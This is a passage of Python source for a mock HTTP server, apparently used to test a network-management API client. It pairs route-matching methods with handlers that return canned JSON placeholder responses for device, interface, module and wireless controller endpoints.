    body = {'status': 'string', 'description': 'string', 'payload': {'id': 'string', 'instanceId': 0, 'authEntityId': 0, 'displayName': 'string', 'authEntityClass': 0, 'instanceTenantId': 'string', 'deployPending': 'string', 'instanceVersion': 0, 'createTime': 0, 'deployed': True, 'isSeeded': True, 'isStale': True, 'lastUpdateTime': 0, 'name': 'string', 'namespace': 'string', 'provisioningState': 'string', 'resourceVersion': 0, 'targetIdList': [{}], 'type': 'string', 'cfsChangeInfo': [{}], 'customProvisions': [{}], 'configs': [{}], 'managedSites': [{}], 'networkDeviceId': 'string', 'roles': ['string'], 'saveWanConnectivityDetailsOnly': True, 'siteId': 'string', 'akcSettingsCfs': [{}], 'deviceInterfaceInfo': [{}], 'deviceSettings': {'id': 'string', 'instanceId': 0, 'displayName': 'string', 'instanceTenantId': 'string', 'deployPending': 'string', 'instanceVersion': 0, 'connectedTo': [{}], 'cpu': 0, 'dhcpEnabled': True, 'externalConnectivityIpPool': 'string', 'externalDomainRoutingProtocol': 'string', 'internalDomainProtocolNumber': 'string', 'memory': 0, 'nodeType': ['string'], 'storage': 0, 'extConnectivitySettings': [{'id': 'string', 'instanceId': 0, 'displayName': 'string', 'instanceTenantId': 'string', 'deployPending': 'string', 'instanceVersion': 0, 'externalDomainProtocolNumber': 'string', 'interfaceUuid': 'string', 'policyPropagationEnabled': True, 'policySgtTag': 0, 'l2Handoff': [{}], 'l3Handoff': [{'id': 'string', 'instanceId': 0, 'displayName': 'string', 'instanceTenantId': 'string', 'deployPending': 'string', 'instanceVersion': 0, 'localIpAddress': 'string', 'remoteIpAddress': 'string', 'vlanId': 0, 'virtualNetwork': {'idRef': 'string'}}]}]}, 'networkWideSettings': {'id': 'string', 'instanceId': 0, 'displayName': 'string', 'instanceTenantId': 'string', 'deployPending': 'string', 'instanceVersion': 0, 'aaa': [{}], 'cmx': [{}], 'dhcp': [{'id': 'string', 'ipAddress': {'id': 'string', 'paddedAddress': 'string', 'addressType': 'string', 'address': 'string'}}], 'dns': [{'id': 'string', 'domainName': 'string', 'ip': {'id': 'string', 'paddedAddress': 'string', 'addressType': 'string', 'address': 'string'}}], 'ldap': [{}], 'nativeVlan': [{}], 'netflow': [{}], 'ntp': [{}], 'snmp': [{}], 'syslogs': [{}]}, 'otherDevice': [{}], 'transitNetworks': [{'idRef': 'string'}], 'virtualNetwork': [{}], 'wlan': [{}]}}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_0db7da744c0b83d8(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_0db7da744c0b83d8_PATTERN, self.path)
def devices_get_module_infoby_id_response(self):
    """Reply 200 OK with the canned JSON body for 'get module info by id'."""
    body = {'response': {'assemblyNumber': 'string', 'assemblyRevision': 'string', 'attributeInfo': {}, 'containmentEntity': 'string', 'description': 'string', 'entityPhysicalIndex': 'string', 'id': 'string', 'isFieldReplaceable': 'UNKNOWN', 'isReportingAlarmsAllowed': 'UNKNOWN', 'manufacturer': 'string', 'moduleIndex': 0, 'name': 'string', 'operationalStateCode': 'string', 'partNumber': 'string', 'serialNumber': 'string', 'vendorEquipmentType': 'string'}, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_1c894b5848eab214(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_1c894b5848eab214_PATTERN, self.path)
def devices_delete_deviceby_id_response(self):
    """Reply 200 OK with the canned JSON body for 'delete device by id'."""
    body = {'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_3b9ef9674429be4c(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_3b9ef9674429be4c_PATTERN, self.path)
def devices_sync_devicesusingforce_sync_response(self):
    """Reply 200 OK with the canned JSON body for 'sync devices using force sync'."""
    body = {'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_20b19b52464b8972(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_20b19b52464b8972_PATTERN, self.path)
def devices_get_devicelist_response(self):
    """Reply 200 OK with the canned JSON body for 'get device list'."""
    body = {'response': [{'apManagerInterfaceIp': 'string', 'associatedWlcIp': 'string', 'bootDateTime': 'string', 'collectionInterval': 'string', 'collectionStatus': 'string', 'errorCode': 'string', 'errorDescription': 'string', 'family': 'string', 'hostname': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceCount': 'string', 'inventoryStatusDetail': 'string', 'lastUpdateTime': 'string', 'lastUpdated': 'string', 'lineCardCount': 'string', 'lineCardId': 'string', 'location': 'string', 'locationName': 'string', 'macAddress': 'string', 'managementIpAddress': 'string', 'memorySize': 'string', 'platformId': 'string', 'reachabilityFailureReason': 'string', 'reachabilityStatus': 'string', 'role': 'string', 'roleSource': 'string', 'serialNumber': 'string', 'series': 'string', 'snmpContact': 'string', 'snmpLocation': 'string', 'softwareType': 'string', 'softwareVersion': 'string', 'tagCount': 'string', 'tunnelUdpPort': 'string', 'type': 'string', 'upTime': 'string', 'waasDeviceMode': 'string'}], 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_288df9494f2a9746(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_288df9494f2a9746_PATTERN, self.path)
def devices_get_device_interface_vlans_response(self):
    """Reply 200 OK with the canned JSON body for 'get device interface VLANs'."""
    body = {'response': [{'interfaceName': 'string', 'ipAddress': 'string', 'mask': 0, 'networkAddress': 'string', 'numberOfIPs': 0, 'prefix': 'string', 'vlanNumber': 0, 'vlanType': 'string'}], 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_38bd0b884b89a785(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_38bd0b884b89a785_PATTERN, self.path)
def devices_get_polling_intervalforalldevices_response(self):
    """Reply 200 OK with the canned JSON body for 'get polling interval for all devices'."""
    body = {'response': 0, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_349c888443b89a58(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_349c888443b89a58_PATTERN, self.path)
def devices_get_device_interfacesbyspecifiedrange_response(self):
    """Reply 200 OK with the canned JSON body for 'get device interfaces by specified range'."""
    body = {'response': [{'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}], 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_3d923b184dc9a4ca(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_3d923b184dc9a4ca_PATTERN, self.path)
def devices_get_device_interface_count_response(self):
    """Reply 200 OK with the canned JSON body for 'get device interface count'."""
    body = {'response': 0, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_4bb22af046fa8f08(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_4bb22af046fa8f08_PATTERN, self.path)
def devices_add_device_response(self):
    """Reply 200 OK with the canned JSON body for 'add device'."""
    body = {'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_4eb56a614cc9a2d2(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_4eb56a614cc9a2d2_PATTERN, self.path)
def devices_get_interfacedetails_response(self):
    """Reply 200 OK with the canned JSON body for 'get interface details'."""
    body = {'response': {'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_5b8639224cd88ea7(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_5b8639224cd88ea7_PATTERN, self.path)
def devices_get_device_interfacecountbyid_response(self):
    """Reply 200 OK with the canned JSON body for 'get device interface count by id'."""
    body = {'response': 0, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_5db21b8e43fab7d8(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_5db21b8e43fab7d8_PATTERN, self.path)
def devices_get_device_count_response(self):
    """Reply 200 OK with the canned JSON body for 'get device count'."""
    body = {'response': 0, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_70ad397649e9b4d3(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_70ad397649e9b4d3_PATTERN, self.path)
def devices_get_ospfinterfaces_response(self):
    """Reply 200 OK with the canned JSON body for 'get OSPF interfaces'."""
    body = {'response': [{'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}], 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_82918a1b4d289c5c(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_82918a1b4d289c5c_PATTERN, self.path)
def devices_get_polling_intervalby_id_response(self):
    """Reply 200 OK with the canned JSON body for 'get polling interval by id'."""
    body = {'response': 0, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_84b37ae54c59ab28(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_84b37ae54c59ab28_PATTERN, self.path)
def devices_get_organizationlistfor_meraki_response(self):
    """Reply 200 OK with the canned JSON body for 'get organization list for Meraki'."""
    body = {'response': ['string'], 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_81bb4804405a8d2f(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_81bb4804405a8d2f_PATTERN, self.path)
def devices_get_functional_capabilityby_id_response(self):
    """Reply 200 OK with the canned JSON body for 'get functional capability by id'."""
    body = {'response': {'attributeInfo': {}, 'functionDetails': [{'attributeInfo': {}, 'id': 'string', 'propertyName': 'string', 'stringValue': 'string'}], 'functionName': 'string', 'functionOpState': 'UNKNOWN', 'id': 'string'}, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_84ad8b0e42cab48a(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_84ad8b0e42cab48a_PATTERN, self.path)
def devices_get_isisinterfaces_response(self):
    """Reply 200 OK with the canned JSON body for 'get ISIS interfaces'."""
    body = {'response': [{'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}], 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_84b33a9e480abcaf(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_84b33a9e480abcaf_PATTERN, self.path)
def devices_get_device_configby_id_response(self):
    """Reply 200 OK with the canned JSON body for 'get device config by id'."""
    body = {'response': 'string', 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_819f9aa54feab7bf(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_819f9aa54feab7bf_PATTERN, self.path)
def devices_get_device_summary_response(self):
    """Reply 200 OK with the canned JSON body for 'get device summary'."""
    body = {'response': {'id': 'string', 'role': 'string', 'roleSource': 'string'}, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_8fa8eb404a4a8d96(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_8fa8eb404a4a8d96_PATTERN, self.path)
def devices_get_deviceby_id_response(self):
    """Reply 200 OK with the canned JSON body for 'get device by id'."""
    body = {'response': {'apManagerInterfaceIp': 'string', 'associatedWlcIp': 'string', 'bootDateTime': 'string', 'collectionInterval': 'string', 'collectionStatus': 'string', 'errorCode': 'string', 'errorDescription': 'string', 'family': 'string', 'hostname': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceCount': 'string', 'inventoryStatusDetail': 'string', 'lastUpdateTime': 'string', 'lastUpdated': 'string', 'lineCardCount': 'string', 'lineCardId': 'string', 'location': 'string', 'locationName': 'string', 'macAddress': 'string', 'managementIpAddress': 'string', 'memorySize': 'string', 'platformId': 'string', 'reachabilityFailureReason': 'string', 'reachabilityStatus': 'string', 'role': 'string', 'roleSource': 'string', 'serialNumber': 'string', 'series': 'string', 'snmpContact': 'string', 'snmpLocation': 'string', 'softwareType': 'string', 'softwareVersion': 'string', 'tagCount': 'string', 'tunnelUdpPort': 'string', 'type': 'string', 'upTime': 'string', 'waasDeviceMode': 'string'}, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_ba9dc85b4b8a9a17(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_ba9dc85b4b8a9a17_PATTERN, self.path)
def devices_get_interfaceinfoby_id_response(self):
    """Reply 200 OK with the canned JSON body for 'get interface info by id'."""
    body = {'response': [{'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}], 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_c9809b6744f8a502(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_c9809b6744f8a502_PATTERN, self.path)
def devices_registerdevicefor_wsa_response(self):
    """Reply 200 OK with the canned JSON body for 'register device for WSA'."""
    body = {'response': {'macAddress': 'string', 'modelNumber': 'string', 'name': 'string', 'serialNumber': 'string', 'tenantId': 'string'}, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_b9855ad54ae98156(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_b9855ad54ae98156_PATTERN, self.path)
def devices_update_devicerole_response(self):
    """Reply 200 OK with the canned JSON body for 'update device role'."""
    body = {'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_b7bcaa084e2b90d0(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_b7bcaa084e2b90d0_PATTERN, self.path)
def devices_get_device_configforalldevices_response(self):
    """Reply 200 OK with the canned JSON body for 'get device config for all devices'."""
    body = {'response': [{'attributeInfo': {}, 'cdpNeighbors': 'string', 'healthMonitor': 'string', 'id': 'string', 'intfDescription': 'string', 'inventory': 'string', 'ipIntfBrief': 'string', 'macAddressTable': 'string', 'runningConfig': 'string', 'snmp': 'string', 'version': 'string'}], 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_cd98780f4888a66d(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_cd98780f4888a66d_PATTERN, self.path)
def devices_export_devicelist_response(self):
    """Reply 200 OK with the canned JSON body for 'export device list'."""
    body = {'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_cd8469e647caab0e(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_cd8469e647caab0e_PATTERN, self.path)
def devices_get_interfaceby_ip_response(self):
    """Reply 200 OK with the canned JSON body for 'get interface by IP'."""
    body = {'response': [{'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}], 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_d0a4b88145aabb51(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_d0a4b88145aabb51_PATTERN, self.path)
def devices_get_network_deviceby_ip_response(self):
    """Reply 200 OK with the canned JSON body for 'get network device by IP'."""
    body = {'response': {'apManagerInterfaceIp': 'string', 'associatedWlcIp': 'string', 'bootDateTime': 'string', 'collectionInterval': 'string', 'collectionStatus': 'string', 'errorCode': 'string', 'errorDescription': 'string', 'family': 'string', 'hostname': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceCount': 'string', 'inventoryStatusDetail': 'string', 'lastUpdateTime': 'string', 'lastUpdated': 'string', 'lineCardCount': 'string', 'lineCardId': 'string', 'location': 'string', 'locationName': 'string', 'macAddress': 'string', 'managementIpAddress': 'string', 'memorySize': 'string', 'platformId': 'string', 'reachabilityFailureReason': 'string', 'reachabilityStatus': 'string', 'role': 'string', 'roleSource': 'string', 'serialNumber': 'string', 'series': 'string', 'snmpContact': 'string', 'snmpLocation': 'string', 'softwareType': 'string', 'softwareVersion': 'string', 'tagCount': 'string', 'tunnelUdpPort': 'string', 'type': 'string', 'upTime': 'string', 'waasDeviceMode': 'string'}, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_888f585c49b88441(self):
    """Return a match object when the request path targets this DEVICES endpoint, else None."""
    return re.search(self.DEVICES_888f585c49b88441_PATTERN, self.path)
def devices_get_device_config_count_response(self):
    """Reply 200 OK with the canned JSON body for 'get device config count'."""
    body = {'response': 0, 'version': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_DEVICES_d888ab6d4d59a8c1(self):
    """Match self.path against the DEVICES d888ab6d4d59a8c1 route pattern; return the re.Match or None."""
    return re.search(self.DEVICES_d888ab6d4d59a8c1_PATTERN, self.path)
def devices_get_deviceby_serialnumber_response(self):
    """Serve the mocked get-device-by-serial-number payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': {'apManagerInterfaceIp': 'string', 'associatedWlcIp': 'string', 'bootDateTime': 'string', 'collectionInterval': 'string', 'collectionStatus': 'string', 'errorCode': 'string', 'errorDescription': 'string', 'family': 'string', 'hostname': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceCount': 'string', 'inventoryStatusDetail': 'string', 'lastUpdateTime': 'string', 'lastUpdated': 'string', 'lineCardCount': 'string', 'lineCardId': 'string', 'location': 'string', 'locationName': 'string', 'macAddress': 'string', 'managementIpAddress': 'string', 'memorySize': 'string', 'platformId': 'string', 'reachabilityFailureReason': 'string', 'reachabilityStatus': 'string', 'role': 'string', 'roleSource': 'string', 'serialNumber': 'string', 'series': 'string', 'snmpContact': 'string', 'snmpLocation': 'string', 'softwareType': 'string', 'softwareVersion': 'string', 'tagCount': 'string', 'tunnelUdpPort': 'string', 'type': 'string', 'upTime': 'string', 'waasDeviceMode': 'string'}, 'version': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_DEVICES_f5947a4c439a8bf0(self):
    """Match self.path against the DEVICES f5947a4c439a8bf0 route pattern; return the re.Match or None."""
    return re.search(self.DEVICES_f5947a4c439a8bf0_PATTERN, self.path)
def devices_getallinterfaces_response(self):
    """Serve the mocked get-all-interfaces payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': [{'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}], 'version': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_DEVICES_8db939744649a782(self):
    """Match self.path against the DEVICES 8db939744649a782 route pattern; return the re.Match or None."""
    return re.search(self.DEVICES_8db939744649a782_PATTERN, self.path)
def devices_get_modulecount_response(self):
    """Serve the mocked module-count payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': 0, 'version': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_DEVICES_eb8249e34f69b0f1(self):
    """Match self.path against the DEVICES eb8249e34f69b0f1 route pattern; return the re.Match or None."""
    return re.search(self.DEVICES_eb8249e34f69b0f1_PATTERN, self.path)
def devices_get_modules_response(self):
    """Serve the mocked get-modules payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': [{'assemblyNumber': 'string', 'assemblyRevision': 'string', 'attributeInfo': {}, 'containmentEntity': 'string', 'description': 'string', 'entityPhysicalIndex': 'string', 'id': 'string', 'isFieldReplaceable': 'UNKNOWN', 'isReportingAlarmsAllowed': 'UNKNOWN', 'manufacturer': 'string', 'moduleIndex': 0, 'name': 'string', 'operationalStateCode': 'string', 'partNumber': 'string', 'serialNumber': 'string', 'vendorEquipmentType': 'string'}], 'version': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_DEVICES_f6826a8e41bba242(self):
    """Match self.path against the DEVICES f6826a8e41bba242 route pattern; return the re.Match or None."""
    return re.search(self.DEVICES_f6826a8e41bba242_PATTERN, self.path)
def devices_getwirelesslancontrollerdetailsby_id_response(self):
    """Serve the mocked WLC-details-by-id payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': {'adminEnabledPorts': [0], 'apGroupName': 'string', 'deviceId': 'string', 'ethMacAddress': 'string', 'flexGroupName': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'lagModeEnabled': True, 'netconfEnabled': True, 'wirelessLicenseInfo': 'ADVANTAGE', 'wirelessPackageInstalled': True}, 'version': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_DEVICES_aeb9eb67460b92df(self):
    """Match self.path against the DEVICES aeb9eb67460b92df route pattern; return the re.Match or None."""
    return re.search(self.DEVICES_aeb9eb67460b92df_PATTERN, self.path)
def devices_sync_devices_response(self):
    """Serve the mocked sync-devices payload: HTTP 200 with a JSON body."""
